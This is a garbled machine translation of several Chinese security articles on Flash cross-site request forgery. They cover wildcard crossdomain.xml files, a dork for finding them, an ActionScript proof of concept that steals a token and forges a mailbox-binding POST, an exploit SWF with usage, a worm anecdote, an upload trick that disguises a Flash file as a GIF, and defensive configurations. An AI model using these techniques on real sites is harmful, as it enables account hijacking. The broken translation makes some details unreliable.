Flash CSRF malicious use of attack and defense

Flash csrf noun explanation

CSRF (Cross-site request forgery Cross station forgery, is a malicious use of the site, CSRF by disguising requests from trusted users to take advantage of the trusted Web site.

Flash csrf is usually caused by improper configuration of the Crossdomain.xml file, using SWF to initiate a cross station request forgery.

the cause of Flash csrf formation

See how to find Flash CSRF:

First of all, we need to know how to form CSRF, the reasons for the formation of CSRF are probably as follows:

Flash cross-domain Rights Management file Crossdomain.xml is set to allow all host/domain domains to read and write data across the site:

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain= "*"/>
</cross-domain-policy>

Flash cross-domain Rights management file filtering rules LAX (domain= "*"), resulting in any other domain can be generated from flash CSRF.

how to find out where the flash CSRF

From the above we learned that the Flash CSRF is due to cross domain rights management files improperly configured, so we can open crossdomain.xml in the root directory to see whether the site or only domain names exist Flah CSRF:

Http://www.xxx.com/crossdomain.xml

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain= "*"/>
</cross-domain-policy>

What Flash csrf can do

FLASHCSRF Vulnerability Lookup Process:

Google Hack:crossdomain Filetype:xml

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain= "*" secure= "true"/>
</cross-domain-policy>

Secure=true means to request data for this domain only through secure links <HTTPS>

found that the first 2 are all need to use SSL certificate encrypted after the site inside the Flash file to get the content of the domain, consider you can build SSL Web site, and then call the Flash file can not read their Web site data and send post requests, You can find so many places. Flash has no place to plug in, in disdain of efforts, to find the blog root directory below the Crossdomain.xml file actually allows all the host's flash to read the data in this domain

Flash csrf How to use

Find a place to insert flash, insert your own flash, visitors to the Web page will execute the script we wrote

Here is a look at the specific use of flash CSRF: To make a visitor visit our link, automatically set their own secret mailbox:

First add a confidential mailbox point submission, and then grab the packet to analyze what it commits, and then construct our flash CSRF using code < No anti csrftoken>

1, the application of confidential mailbox, browser to the server sent a POST request, the request address and parameters are:

Post:xxx.xxx.xx/xx.jsp?userid=xxxx&mail=dddd@dddd.com

2, because we have previously tested confidential mailbox that the server did not verify the referer, but the page verified the token, so we can directly put the post packet request address, parameter name, parameter value, token value to be used to forge binding confidential mailbox request.

Take advantage of the code:

Package {
Import Flash.display.Sprite;
Import flash.events.Event;
Import flash.net.*;
Import Flash.text.TextField;
public class URL extends Sprite
{
Public Function URL ()
{
Get the current page Userid/token
var Echo_txt:textfield = new TextField ();
var targeturl:string = "http://xx.xx.cc";
var request:urlrequest = new URLRequest (targeturl);
Request.method = Urlrequestmethod.get;
Request.data = "";
Sendtourl (Request);
var loader:urlloader=new urlloader ();
Loader.addeventlistener (Event.complete,completehandler);
function Completehandler (event:event): void{
var userid:string= (loader.data+ ""). Match (/\/xxxx\/mxxxx\.php\?xxid= (\d+)/) | | [“”,””]) [1];
var masthash:string= (loader.data+ ""). Match (/\/xxxx\/mxxxx\.php\?masthash= (\d+)/) | | [“”,””]) [1];
Echo_txt.text = Masthash;
Forged application for secret mailbox POST request
var emailtargeturl:string = "Http://xxxxxx.xx.cc/xxxx/xxxx.jsp?mark=send";
var emailrequest:urlrequest = new URLRequest (Emailtargeturl);
Emailrequest.method = Urlrequestmethod.post;
var postdata:object = new Array ();
postdata[0]= "xxxx=xxxx@xxx.cc&xxxx=" +xxxxx& "xxxxx=" +XXX;
Emailrequest.data = postdata[0];
Sendtourl (emailrequest);
}
Loader.load (Request);
}
}
}

Flash csrf How to defend

In a nutshell: The site root directory crossdomain.xml access to information across domains right control, accurate to the subdomain,

Attach a copy of crossdomain.xml file permission configuration:

<?xml version= "1.0″?>
<cross-domain-policy>
<allow-access-from domain= "http://xx.xx.com" secure= "true"/>
<allow-access-from domain= "http://cc.xx.com" secure= "true"/>
</cross-domain-policy>

According to their business needs to change the Crossdomain.xml file configuration, remember to be accurate to the subdomain, which will greatly reduce the risk of flash CSRF!

General Flash CSRF EXP:FlashCSRFexp.swf

Use the method:< the real environment only need to load the Flash file will execute the code, but need to overwrite SWF file >

Flashcsrfexp.swf?url=http://www.xx.xx/x.jsp?&xx=xx&xx=xx&xx=xx&xx=xx
Ps:url=[post requested address]&[parameter value separated by &



Popular Science Flash CSRF attack


At the end of 2008, on a dark night, when China's first microblogging site was fanfou.com, I had an authorization security test for the site, and one of the bugs caused my thinking: how to maximize use, how to launch a new attack.

This vulnerability is CSRF (Cross site request forgery, that is, cross-station requests for forgery), this is generally no longer common, small can no longer small loopholes. I know that exploiting this vulnerability could allow users to be hijacked, and then automatically do "bad things" that users can't predict.

Because I am better at Flash, when the university did n Flash small animation, the ActionScript script in Flash is also client-side script, can also do some bad things (not just make some fake HTTP request?) For people who know programming, it's too easy, so I thought of using Flash as a carrier for a quiet attack:
I found an open source flash games (see again);
Modified the inside of the ActionScript code, the implant will initiate a fake HTTP request code;

Regenerate this evil flash;
Posted on your website;
sent a micro-blog: "finally wrote the first flash game: repeatedly see:", it is not easy--... Welcome test: HTTP://XXXX.COM/ENJOY_FLASH_GAME.PHP?HI=YYYY ";
My friends see, click on the chain to take to play, they will not think it is quite fun? haha
In the process of playing, the ActionScript code in Flash executes, initiates a cross station to forge a request, this request will take these people's cookies (the key point), then this request is legal for the rice, then has accomplished some evil operation successfully: they all sent a microblog, Content, but also sent a DMS to their friends;
So spread out ...
The month black wind is high, also can spread, this shows that the night owl is a lot of: 12:00->12:30 half an hour of time, spread very fierce, the crowd began to tense, some people began to scold, someone began to analyze, some people began to question ...

The internet began to boil, I met, removed this evil flash games, wrote a safety assessment report to the meal no, and then wrote the first paper (the next day from Beijing to Alibaba, to attend their first session of the Jing Wu Security conference (also the only one), when still stabbed as a moderator, Circle of famous hackers also came, my first speech to the Flash csrf worm, this is an internal meeting, so no one knows what happened at that time, long before I open.

After the CSRF completed a lot of classic attacks, such as the right to play backstage permissions, to make Gmail, bank sites and so on. CSRF defense began in those open source Web applications to be popularized, the major internet (with SNS nature) are beginning to notice the malicious attacks of CSRF, once Renren a link can destroy a person's all the log, a link can handle a webmaster site backstage, How much authority does the hacker have on the hand ...

Einstein was the biggest hacker.
IC (Know Chuang Yu CEO) often and we say a famous quote of Einstein: "The world is not because of the destruction of the danger, but because of watching them destroy and indifferent people become dangerous." Www.2cto.com He said: "Einstein is the biggest hacker!" ”

We've been trying to explain to web apps vendors and webmasters over the years how CSRF can be compromised, but we found they were just beginning to be indifferent ... This is expected (think about the other people give us "domineering" advice?) , it's basically a security issue that starts to be vigilant, so we think that "they will be touched by a harmless security assessment that proves that the vulnerability is large enough, and that they act immediately after a dangerous hacking event." ”


A statistical

Our website Medical Center is responsible for causing flash One of the reasons for the CSRF vulnerability (whether there is a crossdomain.xml in the site root and whether the XML Allow-access-from is a wildcard, and the wildcard means that any domain can obtain the privacy data for this domain across domains) is statistically statistically available on the hao123 of those popular sites: 7,709.


found that 18% of the sites have this crossdomain.xml, of which 61% have flash csrf vulnerabilities.


Note that the Crossdomain.xml configuration is not secure and can cause any domain to obtain the privacy data of this domain across domains. Note that if you want to send a POST request across domains, you also have to see if the target form is token defensive or Authenticode defensive, and whether the source of the request is judged (for example, only post requests initiated within this domain) Law).


Defense
The defense of this Flash CSRF is simple:
1. Crossdomain.xml Security Configuration can refer to, specify a good trust domain:
Http://weibo.com/crossdomain.xml;
2. Note: discuz! after the installation of the site root directory of this file, the default is not safe, such as: Http://bbs.uc.cn/crossdomain.xml;


Promised open source a flash security test gadget in this: https://github.com/evilcos/xss.swf, how to use yourself to see:

We will continue to carry out security science, we have any questions can be in the micro-letter to us, we will seriously treat each message, and in the next dispatch when necessary answers. If you have any security gossip also welcome to contribute to us.


Science Change the world, we work together to make the Internet better and more secure!




flash+upload Csrf Attack Technology

CSRF's attack and defense techniques are more mature, as I wrote in 2008, "Bypass preventing CSRF" http://www.xfocus.net/articles/200801/964.html, At present, many domestic applications and SNS sites for the defense csrf most of the use of the token+referer combination of defense, but for Flash in bypass such a defense has an innate advantage.

first, the flash of the call and domain

1, the HTML call Flash,flash can change the suffix name.
2, flash can be accessed individually, but its effect is similar to the HTML call with the domain of Flash, but only this suffix must be SWF.
3, Flash launch request, is based on the field of flash to judge, rather than HTML to judge:
A, flash request the same domain resources, directly ignore crossdomain.xml.
b, flash requests the resources of the Outland, under the crossdomain.xml in the context of the policy restrictions.

second, Flash's call and Referer

When HTML calls Outland Flash, Flash's request referer is flash, not HTML. [does not include multiple flash scenes with each other load]

three, csrf attack scene and Way

1, crossdomain.xml settings caused by the CSRF.

Many websites and applications [such as discuz!], by default, set the Crossdomain.xml as follows:

<?xml version= "1.0"?>
<cross-domain-policy>
<allow-access-from domain= "*"/>
</cross-domain-policy>

In this way, we can read the contents of the attacking domain directly through the flash in Outland, and report the key tonken of the defense csrf.

2, upload function caused by the CSRF.

In the above we mentioned that the HTML call Flash, it is possible to modify the suffix. So we can provide the suffix of the flash suffix to the image as GIF to upload to the attack domain [in addition here a little PHP getimagesize () is the support of the Flash file http://cn2.php.net/manual/zh/ Function.getimagesize.php], then according to "Flash launch request, is based on the flash domain to judge, rather than HTML to judge" because the flash suffix has been uploaded to the attack domain GIF, so that is currently fully compliant with "A, When flash requests the same domain resources, it directly ignores the crossdomain.xml "situation.

In addition, according to the "Flash sent the request Referer is flash, rather than HTML", so in this scenario, token+referer the way to judge, the basic can be ignored.

Iv. Practical Application

Refer to the discuz! Flash CSRF Vulnerability "

In fact, through the upload function to achieve the Flash CSRF attack case, as early as 2008 80vul launched the project Sodb has http://www.80vul.com/dzvul/sodb/03/ Sodb-2008-03.txt, only so also have today's article, mainly on some of the details are not enough, leading to a lot of people's understanding of deviations, such as in sodb-2008-03 I upload files to the use of simply bypassing the referer judgment to complete, and ignored the " Flash requests the same domain resources, directly ignore the Crossdomain.xml "request, this is very significant for the defense, because you even delete the Crossdomain.xml file, you can not fully defend the Flash CSRF attack."

v. Defence programmes

This is only for attack defense under the upload feature scenario.

1, "Code and data separation is the important principle of security design" by Thorn
That is, strictly the upload file storage domain and the Web Code domain separation, this is more suitable for large enterprises and application deployment.
2, strengthen the upload file judgment, such as through the file header to determine whether the upload is a flash file, to prohibit the upload of flash files.
3, strengthen the processing of referer, because Flash launched the request of the referer is a flash file, that is, you change flash to GIF file through the HTML call, launched the request Referer is this has been changed to GIF flash URL such as:

Yun_qi_img/1004333ntvhrv8vvy8lrc4.gif

POST Http://127.0.0.1/Discuz_X2.5_SC_UTF8/upload/admin.php?action=members&operation=add http/1.1
host:127.0.0.1
....
Referer:yun_qi_img/1004333ntvhrv8vvy8lrc4.gif
....

Then I defended myself by identifying these similar uncommon file types in Referer.